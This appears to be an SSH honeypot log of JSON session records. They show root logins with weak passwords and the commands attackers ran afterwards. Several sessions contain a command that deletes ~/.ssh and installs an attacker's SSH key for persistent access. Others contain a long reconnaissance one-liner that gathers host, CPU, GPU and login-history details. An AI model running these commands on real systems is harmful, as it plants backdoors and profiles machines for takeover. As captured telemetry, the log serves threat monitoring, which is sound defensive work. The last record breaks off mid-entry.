Credential acceptance event recorded. Target authentication: root / Server_2023
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "3c6b18eb3fba",
"src_ip": "170.0.61.70",
"start_time": "2026-06-30T17:11:54.403556Z",
"end_time": "2026-06-30T17:11:59.238226Z",
"duration": "4.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Server_2023"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 1234
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "9c14b18ba076",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T17:04:05.036926Z",
"end_time": "2026-06-30T17:04:06.295185Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "1234"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "91c1c3923800",
"src_ip": "43.153.204.181",
"start_time": "2026-06-30T17:02:05.873745Z",
"end_time": "2026-06-30T17:02:07.013396Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "ea1eef953ab5",
"src_ip": "43.153.204.181",
"start_time": "2026-06-30T17:02:03.566847Z",
"end_time": "2026-06-30T17:02:05.695731Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / woaini520...
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "dcb2baa5e3a7",
"src_ip": "43.153.204.181",
"start_time": "2026-06-30T17:01:57.506858Z",
"end_time": "2026-06-30T17:02:07.009782Z",
"duration": "9.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "woaini520..."
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / webadmin
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "220fa025a355",
"src_ip": "185.242.3.195",
"start_time": "2026-06-30T16:59:13.131248Z",
"end_time": "2026-06-30T16:59:14.295359Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "webadmin"
},
"commands": [
"echo OK"
],
"detailed_commands": [
{
"cmd": "echo OK",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "f7e700282980",
"src_ip": "218.13.157.209",
"start_time": "2026-06-30T16:58:48.461531Z",
"end_time": "2026-06-30T17:00:48.500434Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 123321
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "826b52c8e503",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:56:19.145650Z",
"end_time": "2026-06-30T16:56:20.406041Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123321"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 123123
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "c22c321867e5",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:46:25.583471Z",
"end_time": "2026-06-30T16:46:26.845813Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123123"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "ffaaf93a134e",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:44:05.443857Z",
"end_time": "2026-06-30T16:44:06.383559Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "1cacaa0fe69c",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:44:03.085990Z",
"end_time": "2026-06-30T16:44:05.287576Z",
"duration": "2.2",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / ww123456.
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "7e431111528f",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:44:01.193253Z",
"end_time": "2026-06-30T16:44:06.380594Z",
"duration": "5.2",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "ww123456."
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
